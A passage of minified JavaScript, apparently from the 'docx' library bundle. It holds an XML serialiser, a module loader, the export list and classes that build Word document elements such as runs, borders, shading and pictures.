le?"_attr"==Object.keys(le)[0]?ve(le._attr):se.push(y(le,D,w+1)):(se.pop(),K=!0,se.push(b(le)))}),K||se.push(""));break;default:se.push(b(U))}return{name:S,interrupt:!1,attributes:ee,content:se,icount:w,indents:O,indent:D}}function M(p,D,w){if("object"!=typeof D)return p(!1,D);var x=D.interrupt?1:D.content.length;function S(){for(;D.content.length;){var U=D.content.shift();if(void 0!==U){if(O(U))return;M(p,U)}}p(!1,(x>1?D.indents:"")+(D.name?"</"+D.name+">":"")+(D.indent&&!w?"\n":"")),w&&w()}function O(U){return!!U.interrupt&&(U.interrupt.append=p,U.interrupt.end=S,U.interrupt=!1,p(!0),!0)}if(p(!1,D.indents+(D.name?"<"+D.name:"")+(D.attributes.length?" "+D.attributes.join(" "):"")+(x?D.name?">":"":D.name?"/>":"")+(D.indent&&x>1?"\n":"")),!x)return p(!1,D.indent?"\n":"");O(D)||S()}Q.exports=function(p,D){"object"!=typeof D&&(D={indent:D});var w,x,S=D.stream?new _:null,O="",U=!1,K=D.indent?!0===D.indent?"    ":D.indent:"",ee=!0;function se(z){ee?g.nextTick(z):z()}function ve(z,l){if(void 0!==l&&(O+=l),z&&!U&&(S=S||new _,U=!0),z&&U){var f=O;se(function(){S.emit("data",f)}),O=""}}function le(z,l){M(ve,y(z,K,K?1:0),l)}function ye(){if(S){var z=O;se(function(){S.emit("data",z),S.emit("end"),S.readable=!1,S.emit("close")})}}return se(function(){ee=!1}),D.declaration&&(x={version:"1.0",encoding:(w=D.declaration).encoding||"UTF-8"},w.standalone&&(x.standalone=w.standalone),le({"?xml":{_attr:x}}),O=O.replace("/>","?>")),p&&p.forEach?p.forEach(function(z,l){var f;l+1===p.length&&(f=ye),le(z,f)}):le(p,ye),S?(S.readable=!0,S):O},Q.exports.element=Q.exports.Element=function(){var p=Array.prototype.slice.call(arguments),D={_elem:y(p),push:function(w){if(!this.append)throw new Error("not assigned to a parent!");var x=this,S=this._elem.indent;M(this.append,y(w,S,this._elem.icount+(S?1:0)),function(){x.append(!0)})},close:function(w){void 0!==w&&this.push(w),this.end&&this.end()}};return D}}},$={};function ae(Q){var F=$[Q];if(void 0!==F)return F.exports;var E=$[Q]={exports:{}};return j[Q].call(E.exports,E,E.exports,ae),E.exports}ae.d=(Q,F)=>{for(var E in F)ae.o(F,E)&&!ae.o(Q,E)&&Object.defineProperty(Q,E,{enumerable:!0,get:F[E]})},ae.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(Q){if("object"==typeof window)return window}}(),ae.o=(Q,F)=>Object.prototype.hasOwnProperty.call(Q,F),ae.r=Q=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(Q,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(Q,"__esModule",{value:!0})};var I={};return(()=>{"use strict";ae.r(I),ae.d(I,{AbstractNumbering:()=>dd,Alignment:()=>X,AlignmentAttributes:()=>G,AlignmentType:()=>O,Attributes:()=>_,BaseEmphasisMark:()=>rt,BaseXmlComponent:()=>Q,Body:()=>Hs,Bookmark:()=>a_,BookmarkEnd:()=>r0,BookmarkStart:()=>yi,Border:()=>R,BorderElement:()=>L,BorderStyle:()=>U,Column:()=>er,ColumnAttributes:()=>Pc,ColumnBreak:()=>ec,Columns:()=>Bm,ColumnsAttributes:()=>ls,Comment:()=>Bs,CommentRangeEnd:()=>Vm,CommentRangeStart:()=>Da,CommentReference:()=>Af,Comments:()=>Zp,ConcreteHyperlink:()=>qd,ConcreteNumbering:()=>ih,DeletedTextRun:()=>O_,DocGridAttributes:()=>Wl,Document:()=>k_,DocumentAttributes:()=>ko,DocumentBackground:()=>od,DocumentBackgroundAttributes:()=>Gd,DocumentDefaults:()=>Ff,DocumentGrid:()=>xs,DocumentGridType:()=>Ho,DotEmphasisMark:()=>Qe,Drawing:()=>Ci,DropCapType:()=>Oc,EMPTY_OBJECT:()=>F,EmphasisMark:()=>Ge,EmphasisMarkType:()=>ve,ExternalHyperlink:()=>Wt,File:()=>k_,FootNoteReferenceRunAttributes:()=>CC,FootNotes:()=>Zu,Footer:()=>VM,FooterWrapper:()=>fl,FootnoteReference:()=>Er,FootnoteReferenceRun:()=>P_,FrameAnchorType:()=>o_,FrameProperties:()=>Gu,FramePropertiesAttributes:()=>Is,FrameWrap:()=>ms,GridSpan:()=>h_,Header:()=>im,HeaderFooterReference:()=>zl,HeaderFooterReferenceType:()=>Pt,HeaderFooterType:()=>Xt,HeaderWrapper:()=>_l,HeadingLevel:()=>Qn,HeightRule:()=>Yu,HorizontalPosition:()=>Vn,HorizontalPositionAlign:()=>ud,HorizontalPositionRelativeFrom:()=>fa,HpsMeasureElement:()=>f,HyperlinkType:()=>ii,IgnoreIfEmptyXmlComponent:()=>g,ImageRun:()=>Hu,ImportDotx:()=>bC,ImportedRootElementAttributes:()=>w,ImportedXmlComponent:()=>D,Indent:()=>ue,InitializableXmlComponent:()=>S,InsertedTextRun:()=>oh,InternalHyperlink:()=>H2,LeaderType:()=>Zt,Level:()=>T_,LevelBase:()=>th,LevelForOverride:()=>jm,LevelFormat:()=>ks,LevelOverride:()=>hC,LevelSuffix:()=>Xd,LineNumberAttributes:()=>qu,LineNumberRestartFormat:()=>Qt,LineNumberType:()=>ws,LineRuleType:()=>qt,Math:()=>gr,MathAccentCharacter:()=>l0,MathAngledBrackets:()=>$d,MathBase:()=>hc,MathCurlyBrackets:()=>zM,MathDegree:()=>f0,MathDenominator:()=>c0,MathFraction:()=>OM,MathFunction:()=>fc,MathFunctionName:()=>Rf,MathFunctionProperties:()=>Qu,MathLimitLocation:()=>d0,MathNAryProperties:()=>Ef,MathNumerator:()=>ju,MathPreSubSuperScript:()=>sa,MathPreSubSuperScriptProperties:()=>u0,MathRadical:()=>X2,MathRadicalProperties:()=>s_,MathRoundBrackets:()=>Ar,MathRun:()=>PM,MathSquareBrackets:()=>J2,MathSubScript:()=>LM,MathSubScriptElement:()=>Df,MathSubScriptProperties:()=>$2,MathSubSuperScript:()=>Qd,MathSubSuperScriptProperties:()=>K2,MathSum:()=>m0,MathSuperScript:()=>wf,MathSuperScriptElement:()=>xf,MathSuperScriptProperties:()=>r_,Media:()=>ld,NumberFormat:()=>N_,NumberProperties:()=>Xn,NumberValueElement:()=>v,Numbering:()=>I0,OnOffElement:()=>l,OutlineLevel:()=>Uu,OverlapType:()=>be,Packer:()=>z_,PageBorderDisplay:()=>ei,PageBorderOffsetFrom:()=>$o,PageBorderZOrder:()=>ai,PageBorders:()=>n_,PageBreak:()=>kc,PageBreakBefore:()=>V2,PageMargin:()=>Vi,PageMarginAttributes:()=>xo,PageNumber:()=>ye,PageNumberSeparator:()=>$t,PageNumberType:()=>wo,PageNumberTypeAttributes:()=>Ia,PageOrientation:()=>zo,PageReference:()=>Fr,PageSize:()=>Fl,PageSizeAttributes:()=>_n,PageTextDirection:()=>Vl,PageTextDirectionType:()=>Ut,Paragraph:()=>uc,ParagraphProperties:()=>ml,ParagraphPropertiesDefaults:()=>em,PrettifyType:()=>ch,RelativeHorizontalPosition:()=>Kd,RelativeVerticalPosition:()=>_c,Run:()=>pt,RunFonts:()=>We,RunProperties:()=>$e,RunPropertiesChange:()=>st,RunPropertiesDefaults:()=>S_,SectionProperties:()=>ds,SectionType:()=>Yt,SectionTypeAttributes:()=>Zo,SequentialIdentifier:()=>a0,Shading:()=>me,ShadingType:()=>se,SimpleField:()=>Yp,SimpleMailMergeField:()=>Ll,SimplePos:()=>Va,SpaceType:()=>ee,Spacing:()=>dc,StringContainer:()=>P,StringValueElement:()=>A,Style:()=>vo,StyleForCharacter:()=>md,StyleForParagraph:()=>Zd,StyleLevel:()=>gC,Styles:()=>Hl,SymbolRun:()=>zt,TDirection:()=>kf,Tab:()=>W2,TabAttributes:()=>B2,TabStop:()=>e_,TabStopItem:()=>Ud,TabStopPosition:()=>Bo,TabStopType:()=>Kt,Table:()=>C0,TableAnchorType:()=>Pf,TableBorders:()=>Rn,TableCell:()=>p_,TableCellBorders:()=>rd,TableFloatOptionsAttributes:()=>_0,TableFloatProperties:()=>aC,TableLayout:()=>hs,TableLayoutType:()=>Xu,TableOfContents:()=>FM,TableOverlap:()=>nr,TableProperties:()=>ul,TableRow:()=>b0,TableRowHeight:()=>hl,TableRowHeightAttributes:()=>sd,TableRowProperties:()=>y0,TableWidthElement:()=>Rs,TextDirection:()=>Um,TextRun:()=>vt,TextWrappingSide:()=>Co,TextWrappingType:()=>Gt,ThematicBreak:()=>J,Type:()=>Bl,Underline:()=>Le,UnderlineType:()=>le,VerticalAlign:()=>pn,VerticalAlignAttributes:()=>Un,VerticalAlignElement:()=>ur,VerticalMerge:()=>f_,VerticalMergeType:()=>$u,VerticalPosition:()=>Pn,VerticalPositionAlign:()=>Zm,VerticalPositionRelativeFrom:()=>Jt,WORKAROUND:()=>ni,WORKAROUND2:()=>eh,WORKAROUND3:()=>x,WORKAROUND4:()=>h0,WidthType:()=>Nc,WrapNone:()=>ss,WrapSquare:()=>ad,WrapTight:()=>dl,WrapTopAndBottom:()=>Bu,XmlAttributeComponent:()=>b,XmlComponent:()=>E,convertInchesToTwip:()=>tr.convertInchesToTwip,convertMillimetersToTwip:()=>tr.convertMillimetersToTwip,convertToXmlComponent:()=>M,dateTimeValue:()=>tr.dateTimeValue,decimalNumber:()=>tr.decimalNumber,eighthPointMeasureValue:()=>tr.eighthPointMeasureValue,hexColorValue:()=>tr.hexColorValue,hpsMeasureValue:()=>tr.hpsMeasureValue,longHexNumber:()=>tr.longHexNumber,measurementOrPercentValue:()=>tr.measurementOrPercentValue,percentageValue:()=>tr.percentageValue,pointMeasureValue:()=>tr.pointMeasureValue,positiveUniversalMeasureValue:()=>tr.positiveUniversalMeasureValue,sectionMarginDefaults:()=>tc,sectionPageSizeDefaults:()=>$a,shortHexNumber:()=>tr.shortHexNumber,signedHpsMeasureValue:()=>tr.signedHpsMeasureValue,signedTwipsMeasureValue:()=>tr.signedTwipsMeasureValue,twipsMeasureValue:()=>tr.twipsMeasureValue,uCharHexNumber:()=>tr.uCharHexNumber,uniqueId:()=>tr.uniqueId,uniqueNumericId:()=>tr.uniqueNumericId,universalMeasureValue:()=>tr.universalMeasureValue,unsignedDecimalNumber:()=>tr.unsignedDecimalNumber});class Q{constructor(Ce){this.rootKey=Ce}}const F=Object.seal({});class E extends Q{constructor(Ce){super(Ce),this.root=new Array}prepForXml(Ce){var nt;const Dt=this.root.map(di=>di instanceof Q?di.prepForXml(Ce):di).filter(di=>void 0!==di);return{[this.rootKey]:Dt.length?1===Dt.length&&(null===(nt=Dt[0])||void 0===nt?void 0:nt._attr)?Dt[0]:Dt:F}}addChildElement(Ce){return this.root.push(Ce),this}}class g extends E{prepForXml(Ce){const nt=super.prepForXml(Ce);if(nt&&("object"!=typeof nt[this.rootKey]||Object.keys(nt[this.rootKey]).length))return nt}}class b extends Q{constructor(Ce){super("_attr"),this.root=Ce}prepForXml(Ce){const nt={};return Object.keys(this.root).forEach(Dt=>{const di=this.root[Dt];void 0!==di&&(nt[this.xmlKeys&&this.xmlKeys[Dt]||Dt]=di)}),{_attr:nt}}}class _ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",color:"w:color",fill:"w:fill",space:"w:space",sz:"w:sz",type:"w:type",rsidR:"w:rsidR",rsidRPr:"w:rsidRPr",rsidSect:"w:rsidSect",w:"w:w",h:"w:h",top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter",linePitch:"w:linePitch",pos:"w:pos"}}}var y=ae(7888);const M=Se=>{switch(Se.type){case void 0:case"element":const Ce=new D(Se.name,Se.attributes),nt=Se.elements||[];for(const Dt of nt){const di=M(Dt);void 0!==di&&Ce.push(di)}return Ce;case"text":return Se.text;default:return}};class p extends b{}class D extends E{static fromXmlString(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});return M(nt)}constructor(Ce,nt){super(Ce),nt&&this.root.push(new p(nt))}push(Ce){this.root.push(Ce)}}class w extends E{constructor(Ce){super(""),this._attr=Ce}prepForXml(Ce){return{_attr:this._attr}}}const x="";class S extends E{constructor(Ce,nt){super(Ce),nt&&(this.root=nt.root)}}var O,U,K,ee,se,ve,le,ye,Se,z=ae(6595);class l extends E{constructor(Ce,nt=!0){super(Ce),!0!==nt&&this.root.push(new _({val:nt}))}}class f extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:(0,z.KR)(nt)}))}}class A extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class v extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class P extends E{constructor(Ce,nt){super(Ce),this.root.push(nt)}}(Se=O||(O={})).START="start",Se.END="end",Se.CENTER="center",Se.BOTH="both",Se.JUSTIFIED="both",Se.DISTRIBUTE="distribute",Se.LEFT="left",Se.RIGHT="right";class G extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class X extends E{constructor(Ce){super("w:jc"),this.root.push(new G({val:Ce}))}}class L extends E{constructor(Ce,{color:nt,size:Dt,space:di,style:pi}){super(Ce),this.root.push(new h({style:pi,color:void 0===nt?void 0:(0,z.dg)(nt),size:void 0===Dt?void 0:(0,z.LV)(Dt),space:void 0===di?void 0:(0,z.gg)(di)}))}}class h extends b{constructor(){super(...arguments),this.xmlKeys={style:"w:val",color:"w:color",size:"w:sz",space:"w:space"}}}!function(Se){Se.SINGLE="single",Se.DASH_DOT_STROKED="dashDotStroked",Se.DASHED="dashed",Se.DASH_SMALL_GAP="dashSmallGap",Se.DOT_DASH="dotDash",Se.DOT_DOT_DASH="dotDotDash",Se.DOTTED="dotted",Se.DOUBLE="double",Se.DOUBLE_WAVE="doubleWave",Se.INSET="inset",Se.NIL="nil",Se.NONE="none",Se.OUTSET="outset",Se.THICK="thick",Se.THICK_THIN_LARGE_GAP="thickThinLargeGap",Se.THICK_THIN_MEDIUM_GAP="thickThinMediumGap",Se.THICK_THIN_SMALL_GAP="thickThinSmallGap",Se.THIN_THICK_LARGE_GAP="thinThickLargeGap",Se.THIN_THICK_MEDIUM_GAP="thinThickMediumGap",Se.THIN_THICK_SMALL_GAP="thinThickSmallGap",Se.THIN_THICK_THIN_LARGE_GAP="thinThickThinLargeGap",Se.THIN_THICK_THIN_MEDIUM_GAP="thinThickThinMediumGap",Se.THIN_THICK_THIN_SMALL_GAP="thinThickThinSmallGap",Se.THREE_D_EMBOSS="threeDEmboss",Se.THREE_D_ENGRAVE="threeDEngrave",Se.TRIPLE="triple",Se.WAVE="wave"}(U||(U={}));class R extends g{constructor(Ce){super("w:pBdr"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class J extends E{constructor(){super("w:pBdr");const Ce=new L("w:bottom",{color:"auto",space:1,style:U.SINGLE,size:6});this.root.push(Ce)}}class Z extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",end:"w:end",left:"w:left",right:"w:right",hanging:"w:hanging",firstLine:"w:firstLine"}}}class ue extends E{constructor({start:Ce,end:nt,left:Dt,right:di,hanging:pi,firstLine:Hi}){super("w:ind"),this.root.push(new Z({start:void 0===Ce?void 0:(0,z.xb)(Ce),end:void 0===nt?void 0:(0,z.xb)(nt),left:void 0===Dt?void 0:(0,z.xb)(Dt),right:void 0===di?void 0:(0,z.xb)(di),hanging:void 0===pi?void 0:(0,z.Jd)(pi),firstLine:void 0===Hi?void 0:(0,z.Jd)(Hi)}))}}class Ie extends E{constructor(){super("w:br")}}!function(Se){Se.BEGIN="begin",Se.END="end",Se.SEPARATE="separate"}(K||(K={}));class Ae extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:fldCharType",dirty:"w:dirty"}}}class Ue extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.BEGIN,dirty:Ce}))}}class Xe extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.SEPARATE,dirty:Ce}))}}class He extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.END,dirty:Ce}))}}!function(Se){Se.DEFAULT="default",Se.PRESERVE="preserve"}(ee||(ee={}));class Be extends b{constructor(){super(...arguments),this.xmlKeys={space:"xml:space"}}}class qe extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class De extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class Ve extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class ze extends b{constructor(){super(...arguments),this.xmlKeys={fill:"w:fill",color:"w:color",type:"w:val"}}}class me extends E{constructor({fill:Ce,color:nt,type:Dt}){super("w:shd"),this.root.push(new ze({fill:void 0===Ce?void 0:(0,z.dg)(Ce),color:void 0===nt?void 0:(0,z.dg)(nt),type:Dt}))}}!function(Se){Se.CLEAR="clear",Se.DIAGONAL_CROSS="diagCross",Se.DIAGONAL_STRIPE="diagStripe",Se.HORIZONTAL_CROSS="horzCross",Se.HORIZONTAL_STRIPE="horzStripe",Se.NIL="nil",Se.PERCENT_5="pct5",Se.PERCENT_10="pct10",Se.PERCENT_12="pct12",Se.PERCENT_15="pct15",Se.PERCENT_20="pct20",Se.PERCENT_25="pct25",Se.PERCENT_30="pct30",Se.PERCENT_35="pct35",Se.PERCENT_37="pct37",Se.PERCENT_40="pct40",Se.PERCENT_45="pct45",Se.PERCENT_50="pct50",Se.PERCENT_55="pct55",Se.PERCENT_60="pct60",Se.PERCENT_62="pct62",Se.PERCENT_65="pct65",Se.PERCENT_70="pct70",Se.PERCENT_75="pct75",Se.PERCENT_80="pct80",Se.PERCENT_85="pct85",Se.PERCENT_87="pct87",Se.PERCENT_90="pct90",Se.PERCENT_95="pct95",Se.REVERSE_DIAGONAL_STRIPE="reverseDiagStripe",Se.SOLID="solid",Se.THIN_DIAGONAL_CROSS="thinDiagCross",Se.THIN_DIAGONAL_STRIPE="thinDiagStripe",Se.THIN_HORIZONTAL_CROSS="thinHorzCross",Se.THIN_REVERSE_DIAGONAL_STRIPE="thinReverseDiagStripe",Se.THIN_VERTICAL_STRIPE="thinVertStripe",Se.VERTICAL_STRIPE="vertStripe"}(se||(se={}));class Ke extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",author:"w:author",date:"w:date"}}}!function(Se){Se.DOT="dot"}(ve||(ve={}));class rt extends E{constructor(Ce){super("w:em"),this.root.push(new _({val:Ce}))}}class Ge extends rt{constructor(Ce=ve.DOT){super(Ce)}}class Qe extends rt{constructor(){super(ve.DOT)}}class ht extends E{constructor(Ce){super("w:spacing"),this.root.push(new _({val:(0,z.xb)(Ce)}))}}class mt extends E{constructor(Ce){super("w:color"),this.root.push(new _({val:(0,z.dg)(Ce)}))}}class lt extends E{constructor(Ce){super("w:highlight"),this.root.push(new _({val:Ce}))}}class ft extends E{constructor(Ce){super("w:highlightCs"),this.root.push(new _({val:Ce}))}}class xe extends b{constructor(){super(...arguments),this.xmlKeys={ascii:"w:ascii",cs:"w:cs",eastAsia:"w:eastAsia",hAnsi:"w:hAnsi",hint:"w:hint"}}}class We extends E{constructor(Ce,nt){super("w:rFonts"),this.root.push(new xe("string"==typeof Ce?{ascii:Ce,cs:Ce,eastAsia:Ce,hAnsi:Ce,hint:nt}:Ce))}}class Je extends E{constructor(Ce){super("w:vertAlign"),this.root.push(new _({val:Ce}))}}class Oe extends Je{constructor(){super("superscript")}}class Te extends Je{constructor(){super("subscript")}}!function(Se){Se.SINGLE="single",Se.WORDS="words",Se.DOUBLE="double",Se.THICK="thick",Se.DOTTED="dotted",Se.DOTTEDHEAVY="dottedHeavy",Se.DASH="dash",Se.DASHEDHEAVY="dashedHeavy",Se.DASHLONG="dashLong",Se.DASHLONGHEAVY="dashLongHeavy",Se.DOTDASH="dotDash",Se.DASHDOTHEAVY="dashDotHeavy",Se.DOTDOTDASH="dotDotDash",Se.DASHDOTDOTHEAVY="dashDotDotHeavy",Se.WAVE="wave",Se.WAVYHEAVY="wavyHeavy",Se.WAVYDOUBLE="wavyDouble"}(le||(le={}));class Le extends E{constructor(Ce=le.SINGLE,nt){super("w:u"),this.root.push(new _({val:Ce,color:void 0===nt?void 0:(0,z.dg)(nt)}))}}class $e extends g{constructor(Ce){var nt,Dt;if(super("w:rPr"),!Ce)return;void 0!==Ce.bold&&this.push(new l("w:b",Ce.bold)),(void 0===Ce.boldComplexScript&&void 0!==Ce.bold||Ce.boldComplexScript)&&this.push(new l("w:bCs",null!==(nt=Ce.boldComplexScript)&&void 0!==nt?nt:Ce.bold)),void 0!==Ce.italics&&this.push(new l("w:i",Ce.italics)),(void 0===Ce.italicsComplexScript&&void 0!==Ce.italics||Ce.italicsComplexScript)&&this.push(new l("w:iCs",null!==(Dt=Ce.italicsComplexScript)&&void 0!==Dt?Dt:Ce.italics)),Ce.underline&&this.push(new Le(Ce.underline.type,Ce.underline.color)),Ce.emphasisMark&&this.push(new Ge(Ce.emphasisMark.type)),Ce.color&&this.push(new mt(Ce.color)),void 0!==Ce.size&&this.push(new f("w:sz",Ce.size));const di=void 0===Ce.sizeComplexScript||!0===Ce.sizeComplexScript?Ce.size:Ce.sizeComplexScript;di&&this.push(new f("w:szCs",di)),void 0!==Ce.rightToLeft&&this.push(new l("w:rtl",Ce.rightToLeft)),void 0!==Ce.smallCaps?this.push(new l("w:smallCaps",Ce.smallCaps)):void 0!==Ce.allCaps&&this.push(new l("w:caps",Ce.allCaps)),void 0!==Ce.strike&&this.push(new l("w:strike",Ce.strike)),void 0!==Ce.doubleStrike&&this.push(new l("w:dstrike",Ce.doubleStrike)),Ce.subScript&&this.push(new Te),Ce.superScript&&this.push(new Oe),Ce.style&&this.push(new A("w:rStyle",Ce.style)),Ce.font&&this.push("string"==typeof Ce.font?new We(Ce.font):"name"in Ce.font?new We(Ce.font.name,Ce.font.hint):new We(Ce.font)),Ce.highlight&&this.push(new lt(Ce.highlight));const pi=void 0===Ce.highlightComplexScript||!0===Ce.highlightComplexScript?Ce.highlight:Ce.highlightComplexScript;pi&&this.push(new ft(pi)),Ce.characterSpacing&&this.push(new ht(Ce.characterSpacing)),void 0!==Ce.emboss&&this.push(new l("w:emboss",Ce.emboss)),void 0!==Ce.imprint&&this.push(new l("w:imprint",Ce.imprint)),Ce.shading&&this.push(new me(Ce.shading)),Ce.revision&&this.push(new st(Ce.revision)),Ce.border&&this.push(new L("w:bdr",Ce.border))}push(Ce){this.root.push(Ce)}}class st extends E{constructor(Ce){super("w:rPrChange"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new $e(Ce))}}class xt extends E{constructor(Ce){super("w:t"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}!function(Se){Se.CURRENT="CURRENT",Se.TOTAL_PAGES="TOTAL_PAGES",Se.TOTAL_PAGES_IN_SECTION="TOTAL_PAGES_IN_SECTION"}(ye||(ye={}));class pt extends E{constructor(Ce){if(super("w:r"),this.properties=new $e(Ce),this.root.push(this.properties),Ce.break)for(let nt=0;nt<Ce.break;nt++)this.root.push(new Ie);if(Ce.space&&this.root.push(new Be({space:Ce.space})),Ce.children)for(const nt of Ce.children)if("string"!=typeof nt)this.root.push(nt);else switch(nt){case ye.CURRENT:this.root.push(new Ue),this.root.push(new qe),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES:this.root.push(new Ue),this.root.push(new De),this.root.push(new Xe),this.root.push(new He);break;case ye.TOTAL_PAGES_IN_SECTION:this.root.push(new Ue),this.root.push(new Ve),this.root.push(new Xe),this.root.push(new He);break;default:this.root.push(new xt(nt))}else Ce.text&&this.root.push(new xt(Ce.text))}}class vt extends pt{constructor(Ce){if("string"==typeof Ce)return super({}),this.root.push(new xt(Ce)),this;super(Ce)}}class Wi extends b{constructor(){super(...arguments),this.xmlKeys={char:"w:char",symbolfont:"w:font"}}}class Ft extends E{constructor(Ce="",nt="Wingdings"){super("w:sym"),this.root.push(new Wi({char:Ce,symbolfont:nt}))}}class zt extends pt{constructor(Ce){if("string"==typeof Ce)return super({}),void this.root.push(new Ft(Ce));super(Ce),this.root.push(new Ft(Ce.char,Ce.symbolfont))}}var fa,Jt,Gt,Co,jt,qt,Qn,Kt,Zt,Bo,ti,ii,pn,Pt,Xt,Ho,Qt,ei,$o,ai,$t,zo,Ut,Yt,ua=ae(5457);(function(Se){Se.CHARACTER="character",Se.COLUMN="column",Se.INSIDE_MARGIN="insideMargin",Se.LEFT_MARGIN="leftMargin",Se.MARGIN="margin",Se.OUTSIDE_MARGIN="outsideMargin",Se.PAGE="page",Se.RIGHT_MARGIN="rightMargin"})(fa||(fa={})),function(Se){Se.BOTTOM_MARGIN="bottomMargin",Se.INSIDE_MARGIN="insideMargin",Se.LINE="line",Se.MARGIN="margin",Se.OUTSIDE_MARGIN="outsideMargin",Se.PAGE="page",Se.PARAGRAPH="paragraph",Se.TOP_MARGIN="topMargin"}(Jt||(Jt={}));class Ha extends b{constructor(){super(...arguments),this.xmlKeys={x:"x",y:"y"}}}class Va extends E{constructor(){super("wp:simplePos"),this.root.push(new Ha({x:0,y:0}))}}class co extends E{constructor(Ce){super("wp:align"),this.root.push(Ce)}}class io extends E{constructor(Ce){super("wp:posOffset"),this.root.push(Ce.toString())}}class yo extends b{constructor(){super(...arguments),this.xmlKeys={relativeFrom:"relativeFrom"}}}class Vn extends E{constructor(Ce){if(super("wp:positionH"),this.root.push(new yo({relativeFrom:Ce.relative||fa.PAGE})),Ce.align)this.root.push(new co(Ce.align));else{if(void 0===Ce.offset)throw new Error("There is no configuration provided for floating position (Align or offset)");this.root.push(new io(Ce.offset))}}}class Eo extends b{constructor(){super(...arguments),this.xmlKeys={relativeFrom:"relativeFrom"}}}class Pn extends E{constructor(Ce){if(super("wp:positionV"),this.root.push(new Eo({relativeFrom:Ce.relative||Jt.PAGE})),Ce.align)this.root.push(new co(Ce.align));else{if(void 0===Ce.offset)throw new Error("There is no configuration provided for floating position (Align or offset)");this.root.push(new io(Ce.offset))}}}class lo extends b{constructor(){super(...arguments),this.xmlKeys={uri:"uri"}}}class ao extends b{constructor(){super(...arguments),this.xmlKeys={embed:"r:embed",cstate:"cstate"}}}class bo extends E{constructor(Ce){super("a:blip"),this.root.push(new ao({embed:`rId{${Ce.fileName}}`,cstate:"none"}))}}class $n extends E{constructor(){super("a:srcRect")}}class Do extends E{constructor(){super("a:fillRect")}}class Mo extends E{constructor(){super("a:stretch"),this.root.push(new Do)}}class no extends E{constructor(Ce){super("pic:blipFill"),this.root.push(new bo(Ce)),this.root.push(new $n),this.root.push(new Mo)}}class Kn extends b{constructor(){super(...arguments),this.xmlKeys={noChangeAspect:"noChangeAspect",noChangeArrowheads:"noChangeArrowheads"}}}class Sa extends E{constructor(){super("a:picLocks"),this.root.push(new Kn({noChangeAspect:1,noChangeArrowheads:1}))}}class ra extends E{constructor(){super("pic:cNvPicPr"),this.root.push(new Sa)}}class Bd extends b{constructor(){super(...arguments),this.xmlKeys={id:"id",name:"name",descr:"descr"}}}class ll extends E{constructor(){super("pic:cNvPr"),this.root.push(new Bd({id:0,name:"",descr:""}))}}class Bn extends E{constructor(){super("pic:nvPicPr"),this.root.push(new ll),this.root.push(new ra)}}class Hd extends b{constructor(){super(...arguments),this.xmlKeys={xmlns:"xmlns:pic"}}}class Wo extends b{constructor(){super(...arguments),this.xmlKeys={cx:"cx",cy:"cy"}}}class rs extends E{constructor(Ce,nt){super("a:ext"),this.attributes=new Wo({cx:Ce,cy:nt}),this.root.push(this.attributes)}}class w2 extends b{constructor(){super(...arguments),this.xmlKeys={x:"x",y:"y"}}}class ja extends E{constructor(){super("a:off"),this.root.push(new w2({x:0,y:0}))}}class La extends b{constructor(){super(...arguments),this.xmlKeys={flipVertical:"flipV",flipHorizontal:"flipH",rotation:"rot"}}}class Xp extends E{constructor(Ce){var nt,Dt;super("a:xfrm"),this.root.push(new La({flipVertical:null===(nt=Ce.flip)||void 0===nt?void 0:nt.vertical,flipHorizontal:null===(Dt=Ce.flip)||void 0===Dt?void 0:Dt.horizontal,rotation:Ce.rotation})),this.extents=new rs(Ce.emus.x,Ce.emus.y),this.root.push(new ja),this.root.push(this.extents)}}class DM extends E{constructor(){super("a:avLst")}}class gi extends b{constructor(){super(...arguments),this.xmlKeys={prst:"prst"}}}class Mf extends E{constructor(){super("a:prstGeom"),this.root.push(new gi({prst:"rect"})),this.root.push(new DM)}}class Qa extends b{constructor(){super(...arguments),this.xmlKeys={bwMode:"bwMode"}}}class Hn extends E{constructor(Ce){super("pic:spPr"),this.root.push(new Qa({bwMode:"auto"})),this.form=new Xp(Ce),this.root.push(this.form),this.root.push(new Mf)}}class I2 extends E{constructor(Ce,nt){super("pic:pic"),this.root.push(new Hd({xmlns:"http://schemas.openxmlformats.org/drawingml/2006/picture"})),this.root.push(new Bn),this.root.push(new no(Ce)),this.root.push(new Hn(nt))}}class R2 extends E{constructor(Ce,nt){super("a:graphicData"),this.root.push(new lo({uri:"http://schemas.openxmlformats.org/drawingml/2006/picture"})),this.pic=new I2(Ce,nt),this.root.push(this.pic)}}class S2 extends b{constructor(){super(...arguments),this.xmlKeys={a:"xmlns:a"}}}class Vu extends E{constructor(Ce,nt){super("a:graphic"),this.root.push(new S2({a:"http://schemas.openxmlformats.org/drawingml/2006/main"})),this.data=new 